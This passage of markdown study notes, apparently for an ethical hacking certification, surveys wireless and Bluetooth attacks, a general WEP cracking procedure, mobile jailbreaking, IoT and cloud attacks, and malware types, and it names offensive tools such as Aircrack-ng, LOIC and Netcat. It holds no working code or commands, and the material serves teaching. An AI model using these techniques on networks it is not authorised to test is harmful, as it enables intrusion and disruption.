81 | | 802.16 WiMax | 34-1000 | 2-11 | SOFDMA | 1600-9650 | 82 | 83 | - **802.11d**: enhancement to 802.11a and 802.11b, global portability, allow variation in freq, power levers, and bandwidth 84 | - **802.11e**: guidance for prioritization of data, voice and voice transmission enabling QoS 85 | - **802.11i**: standard for WLANs \(Wireless Local Area Networks\) that provides improved encryption for networks using 802.11a, 802.11b, and 802.11g standards; denfines WPA2-Enterprise/WPA2-Personal for Wi-Fi 86 | - **802.11ac**: high throughput network at 5GHz, faster and more reliable than 802.11n, Gigabit networking 87 | - **Z-Wave**: primarily for home automation, 800-900 MHz radio, 100 meters range 88 | 89 | #### How to remember all 802.11x standards 90 | 91 | - **Speed 54 OFDM**: ang 92 | - **Frequency 5**: an 93 | - **Range**: a\<b=g\<n 94 | - **n**: s600, f2.4/5, MIMO-OFDM, 250 95 | - **d/e/i/ac**: **d**iversity global, **e**nsure QoS, **i**mplement encryption, **ac**celeration 96 | 97 | ### Wireless Encryption 98 | 99 | #### WEP \(Wired Equivalent Privacy\) 100 | 101 | - WEP doesn't effectively encrypt anything 102 | 103 | ##### IV \(Initialization Vector\) 104 | 105 | - Used to calculate a 32-bit integrity check value \(ICV\) 106 | - IVs are generally small and are frequently reused 107 | - Sent in clear text as a part of the header, combined with RC4 makes it easy to decrypt the WEP key 108 | - An attacker can send disassociate requests to the AP to generate a lot of these 109 | 110 | #### WPA/WPA2 \(Wi-Fi Protected Access\) 111 | 112 | - WPA uses TKIP \(Temporal Key Integrity Protocol\) with a 128-bit key 113 | - WPA changes the key every 10,000 packets 114 | - WPA transfers keys back and forth during an **Extensible Authentication Protocol** \(EAP\) 115 | - WPA uses four-way handshake to derive keys 116 | - **WPA2 Personal**: using a Pre-shared key \(PSK\) to authenticate, preconfigured password 117 | - **WPA2 Enterprise**: can tie an EAP or RADIUS server into the authentication 118 | - WPA2 ensures FIPS 140-2 compliance 119 | - **Message Integrity Codes** \(MIC\): named MICHEAL, hashes for CCMP to protect integrity 120 | - **Cipher Block Chaining Message Authentication Code** \(CBC-MAC\): integrity process of WPA2 121 | 122 | | Wireless Standard | Encryption | IV Size \(Bits\) | Key Length \(Bits\) | Integrity Check \(ICV\) | 123 | | :---------------- | :--------- | :--------------- | :------------------ | :---------------------- | 124 | | WEP | RC4 | 24 | 40/104 | CRC-32 | 125 | | WPA | RC4 + TKIP | 48 | 128 | MIC/CRC-32 | 126 | | WPA2 | AES-CCMP | 48 | 128 | CBC-MAC \(CCMP\) | 127 | 128 | ### Wireless Hacking Threats 129 | 130 | - Access Control Attacks: War Driving, Rogue AP, MAC Spoofing, AP Misconfiguration, Ad Hoc Association, Promiscuous Client, Client Mis-association, Unauthorized Association 131 | - Integrity Attacks: Data Frame Injection, WEP Injection, Bit-Flipping Attack, Replay Attacks 132 | - Confidentiality Attacks: Eavesdropping, Traffic Analysis, Cracking WEP Key, Evil Twin AP, Honeypot AP, Session Hijacking, Masquerading, MITM 133 | - Availability Attacks: AP Theft, Disassociation Attack, EAP Failure, Beacon Flood, DoS, Auth/De-auth Flood, Routing Attack, ARP Cache Poisoning Attack 134 | - Authentication Attacks: Cracking, Identity Theft, Shared Key Gusseing, Password Speculation, Application Login Theft, Key Reinstallation Attack 135 | 136 | ### Wireless Attacks 137 | 138 | #### Rogue Access Point 139 | 140 | - Placing an access point controlled by an attacker 141 | 142 | #### Evil Twin 143 | 144 | - Also known as a mis-association attack 145 | - A rogue AP with a SSID similar to the name of a popular network 146 | 147 | #### Honeypot AP Attack 148 | 149 | - Faking a well-known hotspot with a rogue AP 150 | 151 | #### Ad Hoc Connection Attack 152 | 153 | - Directly connecting to another phone via ad-hoc network 154 | - Not very successful as the other user has to accept connection 155 | 156 | #### DoS Attack 157 | 158 | - Either sends de-auth packets to the AP or jam the wireless signal 159 | - With a de-auth, attacker can have the users connect to attacker's AP instead if it has the same name 160 | 161 | #### MAC Filter 162 | 163 | - Only allowing certain MAC addresses on a network 164 | - Easily broken because you can sniff out MAC addresses already connected and spoof it 165 | - Tools for spoofing including **SMAC** and **TMAC** 166 | 167 | ### Wireless Hacking Methodology 168 | 169 | #### Network Discovery 170 | 171 | - WarWalking: walks around with Wi-Fi to detect open wireless networks 172 | - WarDriving: driving around with Wi-Fi to detect open wireless networks 173 | - WarFlying: using drones to detect wireless networks 174 | - WarChalking: drawing symbols in public places to advertise open Wi-Fi networks 175 | - Tools 176 | - inSSIDer Office: Wi-Fi optimization and troubleshooting tool 177 | - WifiExplorer: known as Wi-Fi scanner, mobile platform to discover Wi-Fi networks 178 | 179 | #### GPS Mapping 180 | 181 | - Discovers a target wireless network then draws a map of the network 182 | - Tool 183 | - WiGLE: map for wireless networks 184 | - NetStumbler: tool to find networks, a Windows tool 185 | - Skyhook: Wi-Fi AP database 186 | - Wi-Fi Finder: hotspot finder 187 | 188 | #### Wireless Traffic Analysis 189 | 190 | - Determine Wi-Fi requirements 191 | - Learn capabilities of a wireless card 192 | - Determine chipset of Wi-Fi card 193 | - Verify chipset capabilities 194 | - Determine drivers and patches required 195 | - Tools 196 | - AirPcap: Wi-Fi USB dongle 197 | - Wireshark with AirPcap: Wi-Fi packet sniffer 198 | - SteelCentral Packet Analyzer 199 | - OmniPeek Enterprise 200 | - Ekahau Spectrum Analyzer 201 | - Airodump-np: reveal hidden SSID 202 | - AirMagnet WiFi Analyzer 203 | - **Kismet** 204 | - Wireless packet analyzer/sniffer used for discovery 205 | - Working on Linux and OSX, Win 10 under WSL 206 | - Working without sending any packets \(passively\) 207 | - Working by channel hopping 208 | - Can detect access points that have not been configured 209 | - Can discover wireless networks that not sending beacon frames 210 | - Ability to sniff packets and save them to a log file \(readable by Wireshark/tcpdump\) 211 | 212 | #### Tools 213 | 214 | - **NetSurveyor** 215 | - Tool for Windows that does similar features to NetStumbler and Kismet 216 | - Doesn't require special drivers 217 | - **WiFi Adapter** 218 | 219 | - AirPcap is mentioned for Windows, but isn't made anymore 220 | - **pcap**: driver library for Windows 221 | 222 | ```text 223 | port and host 224 | ``` 225 | 226 | - **libpcap**: driver library for Linux 227 | 228 | - Cisco Adaptive Wireless IPS: security auditing tool 229 | - WatchGuard WIPS: IPS 230 | - AirMagnet Planner: wireless network planning tool 231 | - Zenmap: vulnerability scanning tool 232 | - Wi-Fi Protector: protects phone from ARP attack, such as DoS or MITM 233 | - WiFiGuard 234 | 235 | #### Wireless Encryption Cracking 236 | 237 | ##### WEP Cracking 238 | 239 | - Easy because of weak IVs 240 | - Process 241 | 1. Start a compatible adapter with injection and sniffing capabilities 242 | 2. Start a sniffer to capture packets 243 | 3. Force the creation of thousands of packets \(generally with de-auth\) 244 | 4. Analyze captured packets 245 | - Methods to crack WEP including **PTW**, **FMS**, **Korek** technique 246 | - Tools 247 | - **Aircrack-ng** 248 | - sniffer, detector, traffic analysis tool and a password cracker 249 | - Using **dictionary list** attacks for WPA and WPA2 250 | - Other attacks **PTW**, **FMS**, and **Korek** are for WEP only 251 | - Cain and Abel 252 | - Sniffing packets and cracks passwords \(may take longer\) 253 | - Relying on statistical measures and PTW technique to break WEP 254 | - KisMAC: MacOS tool to brute force WEP or WPA passwords 255 | - WEPAttack 256 | - WEPCrack 257 | - Portable Penetrator 258 | 259 | ##### WPA Cracking 260 | 261 | - Much more difficult than WEP cracking 262 | - Using a constantly changing temporal key and user-defined password 263 | - **Key Reinstallation Attack** \(KRACK\): replaying attack that uses third handshake of another device's session 264 | - Most other attacks are simply brute-forcing password 265 | - Tools 266 | - Elcomsoft Wireless Security Auditor 267 | - WIBR: WiFi Bruteforce Hack 268 | 269 | ### Bluetooth Hacking 270 | 271 | #### Bluetooth Modes 272 | 273 | - **Discovery mode**: how the device reacts to inquiries from other devices 274 | - **Discoverable**: answering all inquiries 275 | - **Limited Discoverable**: restricting the action 276 | - **Nondiscoverable**: ignoring all inquiries 277 | - **Pairing mode**: how the device deals with pairing requests 278 | - **Pairable**: accepting all requests 279 | - **Non-pairable**: rejecting all connection requests 280 | 281 | #### Bluetooth Attacks 282 | 283 | - **Bluesmacking**: sending oversized ping to victim's device, DoS attack 284 | - **Bluejacking**: sending unsolicited messages 285 | - **Bluesnarfing**: stealing information via Bluetooth 286 | - **Bluesniffing**: finding hidden and discoverable Bluetooth devices 287 | - **Bluebugging**: remotely taking over a device via Bluetooth, sniffs data 288 | - **Blueprinting**: collecting device information over Bluetooth to create info graphics 289 | - Other attacks: MAC Spoofing Attack, MITM/Impersonation Attack 290 | - Tools 291 | - BluetoothView: monitoring activity of Bluetooth devices around you 292 | - Super Bluetooth Hack: all-in-one package 293 | - Bluetooth Firewall 294 | -------------------------------------------------------------------------------- /08-mobile_and_iot_hacking.md: -------------------------------------------------------------------------------- 1 | # 08-Mobile and IoT Hacking 2 | 3 | ## Table of Contents 4 | 5 | - [Mobile and IoT Hacking](08-mobile_and_iot_hacking.md#mobile-and-iot-hacking) 6 | - [Mobile Platform Hacking](08-mobile_and_iot_hacking.md#mobile-platform-hacking) 7 | - [Three Main Avenues of Attack](08-mobile_and_iot_hacking.md#three-main-avenues-of-attack) 8 | - [Device Attacks](08-mobile_and_iot_hacking.md#device-attacks) 9 | - [Network Attacks](08-mobile_and_iot_hacking.md#network-attacks) 10 | - [Data Center/Cloud Attacks](08-mobile_and_iot_hacking.md#data-centercloud-attacks) 11 | - [OWASP Top 10 Mobile Risks 2016](08-mobile_and_iot_hacking.md#owasp-top-10-mobile-risks-2016) 12 | - [Mobile Platforms](08-mobile_and_iot_hacking.md#mobile-platforms) 13 | - [Android Rooting](08-mobile_and_iot_hacking.md#android-rooting) 14 | - [iOS Jailbreaking](08-mobile_and_iot_hacking.md#ios-jailbreaking) 15 | - [Mobile Attacks](08-mobile_and_iot_hacking.md#mobile-attacks) 16 | - [IoT Hacking](08-mobile_and_iot_hacking.md#iot-hacking) 17 | - [Basic Components](08-mobile_and_iot_hacking.md#basic-components) 18 | - [Architecture Levels](08-mobile_and_iot_hacking.md#architecture-levels) 19 | - [IoT Technologies and Protocols](08-mobile_and_iot_hacking.md#iot-technologies-and-protocols) 20 | - [IoT Operating Systems](08-mobile_and_iot_hacking.md#iot-operating-systems) 21 | - [IoT Communicating Models](08-mobile_and_iot_hacking.md#iot-communicating-models) 22 | - [Threat vs Opportunity](08-mobile_and_iot_hacking.md#threat-vs-opportunity) 23 | - [OWASP Top 10 IoT Risks 2014](08-mobile_and_iot_hacking.md#owasp-top-10-iot-risks-2014) 24 | - [IoT Attacks](08-mobile_and_iot_hacking.md#iot-attacks) 25 | 26 | ## Mobile and IoT Hacking 27 | 28 | ### Mobile Platform Hacking 29 | 30 | #### Three Main Avenues of Attack 31 | 32 | ##### Device Attacks 33 | 34 | - Browser based: Phishing, Framing \(using iFrame\), Clickjacking, Man-in-the-Mobile, Buffer Overflow, Data Caching 35 | - Phone/SMS based: Baseband Attack \(GSM/3GPP vulnerability\), SMiShing 36 | - Application based: Sensitive Data Storage, No/Weak Encryption, Improper SSL Validation, Configuration Manipulation, Dynamic Runtime Injection, Unintended Permissions, Escalated Privileges 37 | - OS based: No/Weak Passcode, iOS Jailbreaking, Android Rotting, OS Data Caching, Passwords and Data Accessible, Carrier-loaded Software, User-initiated Code 38 | 39 | ##### Network Attacks 40 | 41 | - Wi-Fi, Rogue AP, Packet Sniffing, MITM, Session Hijacking, DNS Poisoning, SSLStripk \(MITM, SSL/TLS vulnerability\), Fake SSL Certificates 42 | 43 | ##### Data Center/Cloud Attacks 44 | 45 | - Web server based: Platform Vulnerabilities, Server Misconfiguration, XSS, CSRF, Weak Input Validation, Brute-Force 46 | - Database based: SQL Injection, Privilege Escalation, Data Dumping, OS Command Execution 47 | 48 | #### OWASP Top 10 Mobile Risks 2016 49 | 50 | - **M1 Improper Platform Usage**: misuse of features or security controls \(Android intents, TouchID, Keychain\) 51 | - **M2 Insecure Data Storage**: improperly stored data and data leakage 52 | - **M3 Insecure Communication**: poor handshaking, incorrect SSL, clear-text communication 53 | - **M4 Insecure Authentication**: authenticating end user or bad session management 54 | - **M5 Insufficient Cryptography**: code that applies cryptography to an asset, but is insufficient \(does NOT include SSL/TLS\) 55 | - **M6 Insecure Authorization**: failures in authorization \(access rights\) 56 | - **M7 Client Code Quality**: catchall for code-level implementation problems 57 | - **M8 Code Tampering**: binary patching, resource modification, dynamic memory modification 58 | - **M9 Reverse Engineering**: reversing core binaries to find problems and exploits 59 | - **M10 Extraneous Functionality**: catchall for backdoors that were inadvertently placed by coders 60 | 61 | #### Mobile Platforms 62 | 63 | - **Mobile Device Management** \(MDM\) 64 | - Helping enforce security and deploy apps from enterprise 65 | - MDM solutions including IBM MaaS360, XenMobile 66 | - **Bring Your Own Device** \(BYOD\): dangerous for organizations because not all phones can be locked down by default 67 | 68 | ##### Android Rooting 69 | 70 | - Ability to have root access on an Android device 71 | - Tools: KingoRoot, TunesGo Root Android Tool 72 | 73 | ##### iOS Jailbreaking 74 | 75 | - Installing a modified set of kernel patches that allows users to run not signed applications, bypassing user limitations as set by Apple 76 | - **Userland Exploit** 77 | - Using loophole in system app 78 | - Allowing user-level access but not allows iboot-level access 79 | - Firmware updates can patch it 80 | - **iBoot Exploit** 81 | - Using loophole in iBoot \(iDevice's thrid bootloader\) 82 | - Can be Semi-tethered 83 | - Allowing user-level access and iboot-level access 84 | - Firmware updates can patch it 85 | - **BootROM Exploit** 86 | - Using loophole in SecureROM \(iDevice's first bootloader\) 87 | - Allowing user-level access and iboot-level access 88 | - Firmware updates can **NOT** patch it 89 | - Only hardware update of bootrom by Apple can patch it 90 | - **Untethered**: kernel remaining patched after reboot, with or without a system connection 91 | - **Semi-Tethered**: no longer retaining patches after reboot, device is still usable as normal 92 | - **Tethered**: removing all patches after reboot, device may get in boot loop, must be re-jailbreak with a computer 93 | - Tools 94 | - Cydia: app for iOS to find and install software on a jailbroken iOS device 95 | - Pangu Anzhuang: app, no PC required jailbreak method 96 | - Keen Jailbreak: an unofficial semi-tethered tool 97 | 98 | #### Mobile Attacks 99 | 100 | - **App Store attacks**: malicious apps placed in app store, no vetting 101 | - **Android Device Administration API**: allowing for security-aware apps that may help 102 | - **SMS Phishing** \(SMiShing\) 103 | - Sending text message with malicious links 104 | - People tend to trust these more because they happen less 105 | - Apps 106 | - NetCut: blocks Wi-Fi access, works only on rooted devices 107 | - zANTI: hacking app 108 | - Network Spoofer: changing websites from Android phone 109 | - Low Orbit Ion Cannon \(LOIC\): performing Dos/DDos attacks 110 | - DroidSheep: performing session hijacking/sidejacking, using libpcap and arpspoof 111 | - Orbit Proxy: Tor 112 | - FaceNiff: sniffer 113 | - Trojans 114 | - BankBot/Spy.Banker.LA: Android Trojan, banking Trojan 115 | - SpyDealer: Android Trojan, spying Trojan 116 | - AceDeceiver Trojan: iOS Trojan, MITM 117 | - Spy/MobileSpy!iPhoneOS: iOS Trojan 118 | - ZitMo: Zeus-in-the-mobile, banking Trojan 119 | - Mobile Spyware 120 | - mSpy 121 | - FlexiSPY 122 | - Security Tools 123 | - Find My Device/Phone: tracking tool 124 | - Kaspersky Mobile Antivirus 125 | - X-Ray: vulnerability scanner 126 | - Avira Mobile Security 127 | - Lookout Personal: identifying protection, theft prevention 128 | - Zimperium's zIPS: mobile intrusion prevention system app 129 | - BullGuard Mobile Security: complete mobile phone antivirus 130 | - Malwarebytes for Android: anti-spyware 131 | - Pen Testing Tool: Hackode 132 | 133 | ### IoT Hacking 134 | 135 | - IoT is a collection of devices using sensors, software, storage and electronics to collect, analyze, store and share data 136 | - Application + Network + Mobile + Cloud = IoT 137 | 138 | #### Basic Components 139 | 140 | - Sensing Technology: sensors 141 | - IoT gateways: used to bridge the gap between the IoT device and end user 142 | - cloud Server/Data Storage 143 | - Remote Control using Mobile App 144 | 145 | #### Architecture Levels 146 | 147 | - **Edge Technology Layer**: consisting of sensors, RFID tags, readers and the devices 148 | - **Access Gateway Layer**: first data handling, message identification and routing 149 | - **Internet Layer**: crucial layer which serves as main component to allow communication 150 | - **Middleware Layer**: two-way mode, between application and hardware, handles data and device management, data analysis and aggregation 151 | - **Application Layer**: responsible for delivery of services and data to users 152 | 153 | #### IoT Technologies and Protocols 154 | 155 | - **Short range Wireless Communication**: Bluetooth Low Energy \(BLE\), Light-Fidelity \(Li-Fi\), Near-field Communication \(NFC\), QR Codes and Barcodes, Radio Frequency Identification \(RFID\), Thread, Wi-Fi, Wi-Fi Direct, Z-Wave, Zig-Bee 156 | - **Medium Range Wireless Communication**: HaLow, LTE-Advanced 157 | - **Long Range Wireless Communication**: LPWAN, Very Small Aperture Terminal \(VSAT\), Cellular 158 | - **Wired Communication**: Ethernet, Multimedia over Coax Alliance \(MoCA\), Power-line Communication \(PLC\) 159 | 160 | #### IoT Operating Systems 161 | 162 | - **RIOT OS**: embedded systems, actuator boards, sensors; is energy efficient 163 | - **ARM mbed OS**: mostly used on wearables and other low-powered devices 164 | - **RealSense OS X**: Intel's depth sensing version; mostly found in cameras and other sensors 165 | - **Nucleus RTOS**: used in aerospace, medical and industrial applications 166 | - **Brillo**: Android-based OS; generally found in thermostats 167 | - **Contiki**: OS made for low-power devices; found mostly in street lighting and sound monitoring 168 | - **Zephyr**: option for low-power devices and devices without many resources 169 | - **Ubuntu Core**: used in robots and drones; known as "snappy" 170 | - **Integrity RTOS**: found in aerospace, medical, defense, industrial and automotive sensors 171 | - **Apache Mynewt**: used in devices using Bluetooth Low Energy Protocol 172 | 173 | #### IoT Communicating Models 174 | 175 | - **Device to Device**: communicates directly with other IoT devices 176 | - **Device to Cloud**: communicates directly to a cloud service 177 | - **Device to Gateway**: communicates with a gateway before sending to the cloud 178 | - **Back-End Data Sharing**: like device to cloud but adding abilities for parties to collect and use the data 179 | 180 | #### Threat vs Opportunity 181 | 182 | - **Misconfigured** and **Misapprehended**: posing unprecedented risk to personal data, privacy and safety 183 | - **Apprehended** and **Protected**: boosting transmissions, communications, delivery of services and standard of living 184 | 185 | #### OWASP Top 10 IoT Risks 2014 186 | 187 | - I1 Insecure Web Interface 188 | - I2 Insufficient Authentication/Authorization 189 | - I3 Insecure Network Services 190 | - I4 Lack of Transport Encryption/Integrity Verification 191 | - I5 Privacy Concerns 192 | - I6 Insecure Cloud Interface 193 | - I7 Insecure Mobile Interface 194 | - I8 Insufficient Security Configurability 195 | - I9 Insecure Software/Firmware 196 | - I10 Poor Physical Security 197 | 198 | #### IoT Attacks 199 | 200 | - **Exploiting HVAC Attack**: attacking on HVAC systems, Heating, Ventilation and Air Conditioning 201 | - **Rolling Code**: jamming a key fob's communications, steals the code and then creates a subsequent code 202 | - **BlueBorne Attack**: attacking against Bluetooth devices by exploiting vulnerabilities of Bluetooth protocol 203 | - **Jamming Attack**: jamming signal between sender and receiver with malicious traffic, makes two endpoints unable to communicate with each other 204 | - **Remote Access using Backdoor**: exploiting vulnerabilities in IoT device to turn it into a backdoor and gain access to target network 205 | - **Remote Access using Telnet**: exploiting an open telnet port to obtain information 206 | - **Sybil Attack**: using multiple forged identities to create the illusion of traffic 207 | - **Replay Attack**: intercepting legitimate messages from a valid communication and continuously send the intercepted message to target device to perform a DoS attack or crash the target device 208 | - **Forged Malicious Device**: replacing authentic IoT devices with malicious ones, if they have physical access to the network 209 | - Other attacks: Exploit Kits, DDoS Attack, MITM Attack, Side Channel Attack, Ransomware Attack 210 | - Case Study: **Dyn Attack** 211 | - **Mirai** malware: finding IoT devices to infect and adds them to botnet 212 | - Triggers DDoS 1+ Tbps attack on OVH and DYN in October 2016 213 | - Hacking Tools 214 | - Search engine: Shodan, Censys, Tingful 215 | - MultiPing: information gathering tool to find IP addres of any IoT devices 216 | - Foren6: IoT traffic sniffer 217 | - Z-Wave Sniffer 218 | - beSTORM: vulnerability scanning tool, smart fuzzer to find butter overflow 219 | - RFCrack: obtaining rolling code 220 | - Attify: attacking Zigbee networks 221 | - HackRF One: an advanced hardware and software, performs BlueBorne or AirBorne attacks, such as replay, fuzzing, jamming etc 222 | - Firmware Mod Kit: reconstructing firmware images for embedded devices 223 | - Firmalyzer Enterprise: performing automated security assessment on software that powers IoT device firmware 224 | - Security Tools 225 | - SeaCat.io: SaaS to operate IoT products 226 | - DigiCert IoT Security Solution 227 | -------------------------------------------------------------------------------- /09-security_in_cloud_computing.md: -------------------------------------------------------------------------------- 1 | # 09-Security in Cloud Computing 2 | 3 | ## Table of Contents 4 | 5 | - [Security in Cloud Computing](09-security_in_cloud_computing.md#security-in-cloud-computing) 6 | - [Cloud Computing Basics](09-security_in_cloud_computing.md#cloud-computing-basics) 7 | - [Characteristics](09-security_in_cloud_computing.md#characteristics) 8 | - [Limitations](09-security_in_cloud_computing.md#limitations) 9 | - [Three Types of Cloud Computing Services](09-security_in_cloud_computing.md#three-types-of-cloud-computing-services) 10 | - [IaaS \(Infrastructure as a Service\)](09-security_in_cloud_computing.md#iaas-infrastructure-as-a-service) 11 | - [PaaS \(Platform as a Service\)](09-security_in_cloud_computing.md#paas-platform-as-a-service) 12 | - [SaaS \(Software as a Service\)](09-security_in_cloud_computing.md#saas-software-as-a-service) 13 | - [Deployment Models](09-security_in_cloud_computing.md#deployment-models) 14 | - [NIST Cloud Architecture](09-security_in_cloud_computing.md#nist-cloud-architecture) 15 | - [Cloud Security](09-security_in_cloud_computing.md#cloud-security) 16 | - [Main Threats](09-security_in_cloud_computing.md#main-threats) 17 | - [Attacks](09-security_in_cloud_computing.md#attacks) 18 | 19 | ## Security in Cloud Computing 20 | 21 | ### Cloud Computing Basics 22 | 23 | #### Characteristics 24 | 25 | - On-demand self service 26 | - Distributed storage 27 | - Rapid elasticity 28 | - Automated management 29 | - Broad network access 30 | - Resource pooling 31 | - Measure service: pay-per-use 32 | - Virtualization technology 33 | 34 | #### Limitations 35 | 36 | - Organizations have limited control and flexibility 37 | - Prone to outages and other technical issues 38 | - Security, privacy, and compliance issues 39 | - Contracts and lock-ins 40 | - Depending on network connections 41 | 42 | #### Three Types of Cloud Computing Services 43 | 44 | | On-Premises | IasS | PasS | SaaS | 45 | | :------------- | :--- | :--- | :--- | 46 | | App | | | x | 47 | | Data | | | x | 48 | | Runtime | | x | x | 49 | | Middleware | | x | x | 50 | | O/S | | x | x | 51 | | Virtualization | x | x | x | 52 | | Servers | x | x | x | 53 | | Storage | x | x | x | 54 | | Networking | x | x | x | 55 | 56 | ##### IaaS \(Infrastructure as a Service\) 57 | 58 | - Providing virtualized computing resources 59 | - Third party hosts the servers with hypervisor running the VMs as guests 60 | - Subscribers usually pay on a per-use basis 61 | 62 | ##### PaaS \(Platform as a Service\) 63 | 64 | - Geared towards software development 65 | - Hardware and software hosted by provider 66 | - Providing ability to develop without having to worry about hardware or software 67 | 68 | ##### SaaS \(Software as a Service\) 69 | 70 | - Provider supplies on-demand applications to subscribers 71 | - Offloading the need for patch management, compatibility and version control 72 | 73 | #### Deployment Models 74 | 75 | - **Public Cloud**: services provided over a network that is open for public to use 76 | - **Private Cloud**: cloud solely for use by one single tenant; usually done in larger organizations 77 | - **Community Cloud**: cloud shared by several organizations, but not open to public 78 | - **Hybrid Cloud**: a composition of two or more cloud deployment models 79 | 80 | #### NIST Cloud Architecture 81 | 82 | - **Cloud Consumer**: acquiring and uses cloud products and services 83 | - **Cloud Provider**: purveyor of products and services 84 | - **Cloud Carrier**: organization with responsibility of transferring data; akin to power distributor for electric grid 85 | - **Cloud Auditor**: performing independent examination of cloud service control 86 | - **Cloud Broker**: managing use, performance and delivery of services as well as relationships between providers and subscribers 87 | 88 | ```text 89 | Provider <----------------------- 90 | ^ | IasS, PasS, SasS 91 | | IasS, PasS, SasS | and other services 92 | | | 93 | | | 94 | Auditing Service v Brokered Service v 95 | Auditor <------------------> Broker <------------------> Customer 96 | ^ 97 | | 98 | | Physical 99 | | Infrastructure 100 | | 101 | v 102 | Carrier 103 | ``` 104 | 105 | ### Cloud Security 106 | 107 | - Problem with cloud security is what you are allowed to test and what should you test 108 | - Another concern is if the hypervisor is compromised, all hosts on that hypervisor are as well 109 | - Tools 110 | - Qualys Cloud Platform: end-to-end IT security solution 111 | - CloudPassage Halo: instant visibility and continuous protection for servers in any cloud 112 | - Core CloudInspect: pen-testing application for AWS EC2 users 113 | 114 | #### Main Threats 115 | 116 | - **Data Breach or Loss**: biggest thraet 117 | - Abuse of Cloud Resources 118 | - Insecure Interfaces and APIs 119 | - Insufficient due diligence: moving an application without knowing the security differences 120 | - Shared technology issues: multi-tenant environments that don't provide proper isolation 121 | - Unknown risk profiles: subscribers simply don't know what security provisions are made in the background 122 | - Others including malicious insiders, inadequate design and DDoS 123 | 124 | #### Attacks 125 | 126 | - **Service Hijacking** 127 | - Using Social Engineering Attacks 128 | - - Using Networking Sniffing 129 | - **Session Hijacking** 130 | - Using XSS Attack 131 | - Using Session Riding: basically CSRF 132 | - **DNS Attacks** 133 | - DNS Poisoning 134 | - **Cybersquatting**: conducting phishing scams by registering a domain name that is similar to a cloud service provider 135 | - **Domain Hijacking**: stealing a cloud service provider's domain name 136 | - **Domain Snipping**: registering an elapsed/past domain name 137 | - **Side Channel Attack** or **Cross-guest VM Breach** 138 | - Using an existing VM on the same physical host to attack another 139 | - This is more broadly defined as using something other than the direct interface to attack a system 140 | - **SQL Injection Attack**: targeting SQL servers running vulnerable database applications 141 | - **Cryptanalysis Attack**: weak or broken encryption, weak random number generation 142 | - **Wrapping Attack**: SOAP message intercepted and data in envelope is changed and sent/replayed 143 | - **DoS** and **DDoS Attack** 144 | - **Man-in-the-Cloud \(MITC\) Attack**: carried out by abusing cloud file synchronization services, plants attacker's synchronization token on victim's drive to gain access of victim's files 145 | -------------------------------------------------------------------------------- /10-malware_and_other_attacks.md: -------------------------------------------------------------------------------- 1 | # 10-Malware and Other Attacks 2 | 3 | ## Table of Contents 4 | 5 | - [Malware and Other Attacks](10-malware_and_other_attacks.md#malware-and-other-attacks) 6 | - [Malware](10-malware_and_other_attacks.md#malware) 7 | - [Malware Basics](10-malware_and_other_attacks.md#malware-basics) 8 | - [Trojan](10-malware_and_other_attacks.md#trojan) 9 | - [Types of Trojans](10-malware_and_other_attacks.md#types-of-trojans) 10 | - [Some Trojan Port Numbers](10-malware_and_other_attacks.md#some-trojan-port-numbers) 11 | - [Tools](10-malware_and_other_attacks.md#tools) 12 | - [Virus](10-malware_and_other_attacks.md#virus) 13 | - [Types of Viruses](10-malware_and_other_attacks.md#types-of-viruses) 14 | - [Worm](10-malware_and_other_attacks.md#worm) 15 | - [Analyzing Malware](10-malware_and_other_attacks.md#analyzing-malware) 16 | - [Static Analysis](10-malware_and_other_attacks.md#static-analysis) 17 | - [Dynamic Analysis](10-malware_and_other_attacks.md#dynamic-analysis) 18 | - [Heuristic Analysis](10-malware_and_other_attacks.md#heuristic-analysis) 19 | - [Tools](10-malware_and_other_attacks.md#tools) 20 | - [Preventing Malware](10-malware_and_other_attacks.md#preventing-malware) 21 | - [DoS \(Denial of Service\) Attacks](10-malware_and_other_attacks.md#dos-denial-of-service-attacks) 22 | - [Basic Categories](10-malware_and_other_attacks.md#basic-categories) 23 | - [Tools](10-malware_and_other_attacks.md#tools) 24 | - [Session Hijacking](10-malware_and_other_attacks.md#session-hijacking) 25 | - [Steps](10-malware_and_other_attacks.md#steps) 26 | - [Countermeasures](10-malware_and_other_attacks.md#countermeasures) 27 | - [IPsec \(Internet Protocol Security\)](10-malware_and_other_attacks.md#ipsec-internet-protocol-security) 28 | - [Tools](10-malware_and_other_attacks.md#tools) 29 | 30 | ## Malware and Other Attacks 31 | 32 | ### Malware 33 | 34 | #### Malware Basics 35 | 36 | - Software designed to harm or secretly access a computer system without informed consent 37 | - Most is downloaded from the Internet with or without the user's knowledge 38 | - **Overt Channels**: legitimate communication channels used by programs 39 | - **Covert Channels**: used to transport data in unintended ways 40 | - **Wrappers**: programs that allow you to bind an executable to an innocent file 41 | - Example: IExpress Wizard 42 | - **Crypters** 43 | - Using a combination of encryption and code manipulation to render malware undetectable to security programs 44 | - Example: BitCrypter 45 | - **Packers** 46 | - Compressing the executable into a smaller size, and obscure the actual program, which helps evade signature based detection 47 | - **Entry point** of an executable may refer to a named section of code where the label is the name of a packer 48 | - **Droppers**: installing other malware files on to system either from malware package or Internet 49 | - **Downloader**: downloading other malware from Internet on to PC 50 | - **Injector**: injecting its code into other vulnerable running process and changes the way of execution in order to hide or prevent removal 51 | - **Obfuscator**: concealing its code, makes it hard for security mechanisms detect or remove it 52 | - **Exploit Kit**: helping to deliver exploits and payloads, like Crimepack 53 | 54 | #### Trojan 55 | 56 | - Software that appears to perform a desirable function but instead performs malicious activity 57 | - To hackers, it is a method to gain and maintain access to a system 58 | - Trojans are means of delivery whereas a backdoor provides the open access 59 | 60 | ##### Types of Trojans 61 | 62 | - **Remote Access Trojan** \(RAT\): providing attackers with full control over the victim's system, enabling them to remotely access files, private conversations, accounting data, and others 63 | - PoisonIvy 64 | - MoSucker 65 | - Blackhole 66 | - **Backdoor Trojan**: RAT has UI, the client component, whereas a backdoor does not 67 | - **Botnet Trojan**: infecting numerous of computers across a large geographical area to create a network of bots that is controlled through a Command and Control \(C&C\) center 68 | - Necurs 69 | - Mirai 70 | - **E-banking Trojans**: intercepting victim's account informed before the system can encrypt it, and send it to the attacker's C&C center 71 | - Zeus 72 | - **Proxy Server Trojan**: usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet 73 | - **Covert Channel Tunneling Trojan** \(CCTT\): a RAT, creating arbitrary data transfer channels in previously authorized data streams 74 | - **Defacement Trojan**: once spreading over the system, can destroy or change the entire content present in a database 75 | - **Command Shell Trojan**: providing a backdoor to connect to through command-line access 76 | - **Netcat** 77 | - "Swiss army knife" of tcp/ip hacking 78 | - Providing all sorts of control over a remote shell on a target 79 | - Can connect over TCP or UDP, from any port 80 | - Offering DNS forwarding, 